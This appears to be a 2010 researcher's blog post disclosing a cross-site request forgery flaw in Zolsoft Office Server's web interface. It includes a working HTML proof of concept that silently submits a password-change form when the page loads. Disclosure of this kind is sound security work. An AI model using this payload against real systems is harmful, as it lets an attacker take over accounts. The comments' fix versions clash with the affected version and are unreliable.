This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 6, 2010

Zolsoft Office Server Free Edition 2010.0502 XSRF

A cross-site request forgery vunlerability in the Zoloft Office Server Web UI can be exploited to change the password of a user.


<html>
<body onload="document.forms[0].submit()">
<form action="http://localhost/options3.htm" method="post">
<input type="hidden" name="PassField1" value="new_password" />
<input type="hidden" name="PassField2" value="new_password" />
</form>
</body>
</html>

2 comments:

  1. Version 2010.0120: Fixed the cross-site request bug in the Web service.

    ReplyDelete
  2. Version 2010.0625: Fixed the cross-site request bug in the Web service.

    ReplyDelete